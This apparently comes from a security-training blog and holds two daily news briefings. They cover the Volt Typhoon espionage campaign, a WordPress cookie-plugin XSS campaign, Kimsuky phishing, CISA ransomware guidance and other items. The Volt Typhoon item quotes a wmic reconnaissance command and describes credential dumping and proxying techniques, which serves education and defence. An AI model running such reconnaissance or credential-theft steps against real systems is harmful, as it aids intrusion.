Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Chinese State-Sponsored Threat Actor Targets US Pacific Infrastructure
New reports from Microsoft and the NSA detail the activities of a stealthy cyber-espionage campaign against US critical infrastructure in the US and Pacific, particularly Guam. The threat actor involved, named Volt Typhoon, is a Chinese state-sponsored APT which has operated since mid-2021, and this campaign spans the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors with the likely long-term goal of disrupting critical communications infrastructure between the US and the Western Pacific rim in the event of any future crisis.
Volt Typhoon works hard to evade detection; once they have gained initial access - usually by compromising Fortinet FortiGuard devices - they leverage any privileges gained via the FortiGuard device, extract credentials for an Active Directory account used by the device and then pivot to other devices on the network, using these credentials. They also proxy all traffic to their targets through compromised SOHO routers, including those from ASUS, Cisco, D-Link, NetGear and Zyxel (these devices often have their admin interfaces exposed to the Internet - a very dangerous practice).
Having gained access, the Volt Typhoon operators exploit the target environment via the command line, typically using LOLbins and standard operating system commands such as wmic.exe and netsh.exe as well PowerShell. For example, the command
cmd.exe /c wmic path win32_logicaldisk get caption, filesystem,freespace,size,volumename
will return information about all local and network mounted drives on the system, including drive letter, format, free space, size (network drives shared from the same server usually show the same free space and size - a useful clue) and volume label. Since WMI tracing is disabled by default, this will escape detection, and by not introducing any backdoors or other malware, and by using existing accounts, the intruders will evade detection by EDR tools.
Typically, they will attempt to dump credentials from the LSASS (Local Security Authority Subsystem Service) for subsequent exfiltration, and to use the Ntdsutil.exe command to create installation media for new domain controllers, as the files in these contain usernames and password hashes which they can crack offline by means of dictionary or rainbow tables attacks. In a few cases, the Volt Typhoon operators will create a proxy on a compromised system by using the netsh portproxy command (another LOLbin) and very rarely they will use custom versions of the open-source Impacket and FRP (Fast Reverse Proxy) tools to establish a C2 channel.
The Microsoft report provides some guidance for mitigation and protection, including IOC's, while the associated NSA Joint Cybersecurity Advisory provides more detailed analysis and guidance.
Microsoft Threat Intelligence, Volt Typhoon targets US critical infrastructure with living-off-the-land techniques, blog post, 24 May 2023. Available online at https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/.
NSA, People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection, Joint Cybersecurity Advisory, May 2023. Available online at https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF.
XSS Campaign Targets WordPress Sites
Researchers at Wordfence, a vendor of a specialised web application firewall for WordPress, have revealed a large-scale attack exploiting Beautiful Cookie Consent Banner, a WordPress plugin which is installed on over 40,000 sites. This plugin is vulnerable to a Stored Cross-Site Scripting (XSS) exploit via the nsc_bar_content_href parameter in versions up to and including version 2.10.1 due to insufficient input sanitization and output escaping. This allows an unauthenticated attacker to inject arbitrary scripts into pages, which will then execute whenever a user accesses those pages. The vulnerability merits a CVSS score of 7.2 (high).
A partial patch was introduced in version 2.10.1 of the plugin, and the vulnerability was finally remediated in version 2.10.2 back in January. Wordfence recommends updating to the latest version, 2.13.0, as soon as possible (systems protected by their Wordfence firewall were always protected).
Wordfence's researchers suspect this campaign, which has run since early February, is being conducted by a single threat actor, as every attack contained the same payload - which in fact, failed to work. However, now that the vulnerability is being publicized, it seems likely a competent threat actor will adopt it, making reactive patching particularly important.
Gall, Ram, Wordfence Firewall Blocks Bizarre Large-Scale XSS Campaign, blog post, 24 May 2023. Available online at https://www.wordfence.com/blog/2023/05/wordfence-firewall-blocks-bizarre-large-scale-xss-campaign/.
Security Analyst Jailed for MitM Escalation
Finally, an enjoyable read for your coffee break, with the sad tale of a Security Analyst at a company which had fallen victim to a ransomware attack. Rather than working diligently on behalf of his employer to fend off the attack, the insider decided to turn the situation even further to his advantage, by substituting his own Bitcoin wallet addresses for those in the attackers' ransom demands, and additionally spoofing emails to increase the pressure to pay up.
Unfortunately, his man-in-the-middle exploit was foiled when his employer decided not to pay up - and even worse, his email interference showed up in system logs, leading to his arrest. Although it took 5 years for his case to finally come to court, he decided last week to plead guilty - presumably in hopes of a reduced sentence - and will return to Reading Crown Court for sentencing on 11 July.
South East Regional Organised Crime Unit, Man convicted of blackmail and other offences, press release, 22 May 2023. Available online at https://serocu.police.uk/man-convicted-of-blackmail-and-other-offences/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Kimsuky is Back With New Phishing Campaign
North Korean cyber-espionage APT Kimsuky is running a campaign targeting organizations that show an interest in the DPRK, including human rights activists, defector support organizations and information services, according to researchers at SentinelOne. Kimsuky has been active since at least 2012, engaging in spearphishing and social engineering campaigns to collect intelligence and access sensitive information in order to further the interests of the North Korean government,
In the new campaign, Kimsuky has shifted to using a variant of the RandomQuery malware; although RandomQuery has a range of capabilities including keylogging and dropping additional malware, this variant is used only to perform file enumeration and information exfiltration.
The malware is distributed using Microsoft Compiled HTML Help (CHM) files, which has long been Kimsuky's favourite technique. The group is also using a wider range of TLD's for their C2 infrastructure, including .space, .asia, .click and .online, although they also continue to use legitimate-looking names in the .com domain.
The Sentinel Labs report provides a full analysis of this RandomQuery variant, along with IOC's and a list of malicious domains.
Milenkoski, Aleksandar and Tom Hegel, Kimsuky | Ongoing Campaign Using Tailored Reconnaissance Toolkit, technical report, 23 May 2023. Available online at https://www.sentinelone.com/labs/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit/.
CISA Updates Ransomware Guidance
The US Cybersecurity & Infrastructure Security Agency, FBI, NSA and Multi-State Information Sharing and Analysis Center (MS-ISAC) have updated their #StopRansomware Guide in light of the accelerated tactics and techniques employed by ransomware groups since the initial release of the Guide in 2020. The update incorporates lessons learned from the past two years and includes additional recommended actions, resources, and tools to maximize its relevancy and effectiveness and to further help reduce the prevalence and impacts of ransomware.
The new Guide was developed through the Joint Ransomware Task Force, which was established by the US Congress in 2022 and is co-chaired by CISA and the FBI.
The Guide is available at https://www.cisa.gov/resources-tools/resources/stopransomware-guide.
Cybersecurity & Infrastructure Security Agency, CISA and Partners Update the #StopRansomware Guide, Developed through the Joint Ransomware Task Force (JRTF), alert, 23 May 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/05/23/cisa-and-partners-update-stopransomware-guide-developed-through-joint-ransomware-task-force-jrtf.
Windows Adds Support for .rar, .tar, .gz. (Groan)
Buried among a list of innovations being added to Windows - such as Window Copilot (an AI assistant) and a raft of other AI-powered extensions - is the announcement that the Redmondites are adding native support for additional archive formats, including tar, 7-zip, rar, gz and many others using the libarchive open-source project.
Oh, great. Windows' graphical shell already supports automatic opening and extraction of .zip and .iso formats, and while this is convenient, it has also been seized upon as a way for malware operators to get their product installed onto the systems of unsuspecting victims. Windows normally tags email attachments with the Mark of the Web, to mark them as unsafe and discourage victims from unsafe practices like enabling macros in these files.
However, Windows does not similarly tag the files inside these archive formats, allowing them to sneak past this defensive line. Now the bad guys will have a whole new set of archive filetypes, many of which will be unfamiliar to the unsuspecting victims.
Sigh. As for the privacy and security dangers of AI in the OS - well, that ship has sailed and pointing out the problems is like peeing into the wind.
Panay, Panos, Bringing the power of AI to Windows 11 – unlocking a new era of productivity for customers and developers with Windows Copilot and Dev Home, blog post, 23 May 2023. Available online at https://blogs.windows.com/windowsdeveloper/2023/05/23/bringing-the-power-of-ai-to-windows-11-unlocking-a-new-era-of-productivity-for-customers-and-developers-with-windows-copilot-and-dev-home/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.